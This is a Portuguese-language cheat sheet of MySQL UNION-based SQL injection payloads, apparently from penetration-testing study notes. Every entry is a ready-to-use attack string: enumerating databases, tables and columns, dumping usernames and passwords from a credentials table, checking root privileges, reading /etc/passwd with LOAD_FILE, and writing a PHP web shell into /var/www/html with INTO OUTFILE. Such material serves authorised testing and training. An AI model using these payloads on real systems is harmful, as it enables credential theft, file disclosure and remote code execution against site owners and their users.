# Exploitation

### Enumeração de banco de dados

| `SELECT @@version`                                                                                                          | Impressão digital MySQL com saída de consulta           |
| --------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------- |
| `SELECT SLEEP(5)`                                                                                                           | Impressão digital MySQL sem saída                       |
| `cn' UNION select 1,database(),2,3-- -`                                                                                     | Nome do banco de dados atual                            |
| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -`                                                   | Listar todos os bancos de dados                         |
| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -`                  | Listar todas as tabelas em um banco de dados específico |
| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | Listar todas as colunas de uma tabela específica        |
| `cn' UNION select 1, username, password, 4 from dev.credentials-- -`                                                        | Despejar dados de uma tabela em outro banco de dados    |

### Privilégios

| `cn' UNION SELECT 1, user(), 3, 4-- -`                                                                                                     | Encontrar usuário atual                                          |
| ------------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------------- |
| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -`                                                               | Descubra se o usuário tem privilégios de administrador           |
| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -` | Descubra se todos os privilégios do usuário                      |
| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Descubra quais diretórios podem ser acessados ​​através do MySQL |

### Injeção de arquivos

| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -`                                                  | Ler arquivo local                             |
| --------------------------------------------------------------------------------------------------------- | --------------------------------------------- |
| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'`                              | Escreva uma string em um arquivo local        |
| `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Escreva um web shell no diretório base da web |